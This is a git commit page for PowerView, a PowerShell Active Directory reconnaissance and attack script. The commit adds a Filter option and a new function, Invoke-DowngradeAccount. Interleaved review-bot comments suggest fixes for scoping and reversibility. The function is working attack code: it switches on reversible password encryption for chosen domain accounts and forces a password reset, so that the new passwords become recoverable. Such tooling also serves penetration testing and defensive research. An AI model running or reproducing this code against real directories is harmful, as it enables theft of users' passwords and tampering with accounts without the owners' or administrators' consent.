author | Harmj0y <will@harmj0y.net> | 2015-12-11 14:58:07 -0500 |
---|---|---|
committer | Harmj0y <will@harmj0y.net> | 2015-12-11 14:58:07 -0500 |
commit | a336562b700b462b507182be875a76919db58d88 (patch) | |
tree | 1e32ba2b79d29f16f47e22733c2212b96c763903 /Recon | |
parent | a0b95c36b4a3ce0a172fcf98426601f2faa18d64 (diff) | |
Added Invoke-DowngradeAccount to set an account to use reversible encryption.
Diffstat (limited to 'Recon')
-rw-r--r-- | Recon/PowerView.ps1 | 118 |
1 files changed, 117 insertions, 1 deletions
diff --git a/Recon/PowerView.ps1 b/Recon/PowerView.ps1 index 0745916..46285f4 100644 --- a/Recon/PowerView.ps1 +++ b/Recon/PowerView.ps1 @@ -3618,6 +3618,10 @@ function Set-ADObject { Domain controller to reflect LDAP queries through. + .PARAMETER Filter + + Additional LDAP filter string for the query. + .PARAMETER PropertyName The property name to set. @@ -3628,7 +3632,7 @@ function Set-ADObject { .PARAMETER PropertyXorValue - Integer calue to binary xor (-bxor) with the current int value. + Integer value to binary xor (-bxor) with the current int value. .PARAMETER ClearValue @@ -3668,6 +3672,9 @@ function Set-ADObject { [String] $DomainController, + [String] + $Filter, + [Parameter(Mandatory = $True)] [String] $PropertyName, @@ -3691,6 +3698,7 @@ function Set-ADObject { 'SamAccountName' = $SamAccountName 'Domain' = $Domain 'DomainController' = $DomainController + 'Filter' = $Filter 'PageSize' = $PageSize } # splat the appropriate arguments to Get-ADObject 
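Review bot: The `'Filter' = $Filter` entry added to the Get-ADObject splat in the fourth hunk (with the matching `$Filter` parameter in the third) lets Set-ADObject select its targets by an arbitrary LDAP filter, but the new help text does not say what happens when that filter matches more than one object. Set-ADObject's write logic lies outside these hunks, so it is only presumed that every returned object receives the property change. If that is the case, the `.PARAMETER Filter` entry should say so, for example `Additional LDAP filter string for the query. Every object the filter matches is modified.`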
@@ -3726,6 +3734,114 @@ function Set-ADObject { } +function Invoke-DowngradeAccount { +<# + .SYNOPSIS + + Set reversible encryption on a given account and then force the password + to be set on next user login. To repair use "-Repair". + + .PARAMETER SamAccountName + + The SamAccountName of the domain object you're querying for. + + .PARAMETER Name + + The Name of the domain object you're querying for. + + .PARAMETER Domain + + The domain to query for objects, defaults to the current domain. + + .PARAMETER DomainController + + Domain controller to reflect LDAP queries through. + + .PARAMETER Filter + + Additional LDAP filter string for the query. + + .PARAMETER Repair + + Switch. Unset the reversible encryption flag and force password reset flag. + + .EXAMPLE + + PS> Invoke-DowngradeAccount -SamAccountName jason + + Set reversible encryption on the 'jason' account and force the password to be changed. + + .EXAMPLE + + PS> Invoke-DowngradeAccount -SamAccountName jason -Repair + + Unset reversible encryption on the 'jason' account and remove the forced password change. 
+#> + + [CmdletBinding()] + Param ( + [Parameter(Position=0,ValueFromPipeline=$True)] + [String] + $SamAccountName, + + [String] + $Name, + + [String] + $Domain, + + [String] + $DomainController, + + [String] + $Filter, + + [Switch] + $Repair + ) + + process { + $Arguments = @{ + 'SamAccountName' = $SamAccountName + 'Name' = $Name + 'Domain' = $Domain + 'DomainController' = $DomainController + 'Filter' = $Filter + } + + # splat the appropriate arguments to Get-ADObject + $UACValues = Get-ADObject @Arguments | select useraccountcontrol | ConvertFrom-UACValue + + if($Repair) { + + if($UACValues.Keys -contains "ENCRYPTED_TEXT_PWD_ALLOWED") { + # if reversible encryption is set, unset it + Set-ADObject @Arguments -PropertyName useraccountcontrol -PropertyXorValue 128 + } + + # unset the forced password change + Set-ADObject @Arguments -PropertyName pwdlastset -PropertyValue -1 + } + + else { + + if($UACValues.Keys -contains "DONT_EXPIRE_PASSWORD") { + # if the password is set to never expire, unset + Set-ADObject @Arguments -PropertyName useraccountcontrol -PropertyXorValue 65536 + } + + if($UACValues.Keys -notcontains "ENCRYPTED_TEXT_PWD_ALLOWED") { + # if reversible encryption is not set, set it + Set-ADObject @Arguments -PropertyName useraccountcontrol -PropertyXorValue 128 + } + + # force the password to be changed on next login + Set-ADObject @Arguments -PropertyName pwdlastset -PropertyValue 0 + } + } +} + + function Get-ComputerProperty { <# .SYNOPSIS |
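Review bot: Invoke-DowngradeAccount reads the flags once through `Get-ADObject @Arguments` and then flips them with `-PropertyXorValue`, which is only correct when exactly one object matches; no parameter is mandatory and `-Filter` can match several, so `$UACValues.Keys` may describe a group of accounts while each XOR toggles the bit whatever that account's own state is. A guard at the top of `process`, such as `if(-not ($SamAccountName -or $Name -or $Filter)) { throw 'Specify -SamAccountName, -Name or -Filter' }`, together with a check that a single object came back, would keep the write scoped to the intended account. `-Repair` is also not a true inverse: the DONT_EXPIRE_PASSWORD bit cleared in the else branch is never set again and `pwdlastset` is written as -1 rather than its earlier value, so the help should name the attributes it changes (useraccountcontrol, pwdlastset) and state that the original values are not restored, which lets the change be audited and reverted by hand. Since the function modifies directory objects, `[CmdletBinding(SupportsShouldProcess = $True)]` with a `$PSCmdlet.ShouldProcess(...)` check around the Set-ADObject calls would give callers `-WhatIf` and `-Confirm`.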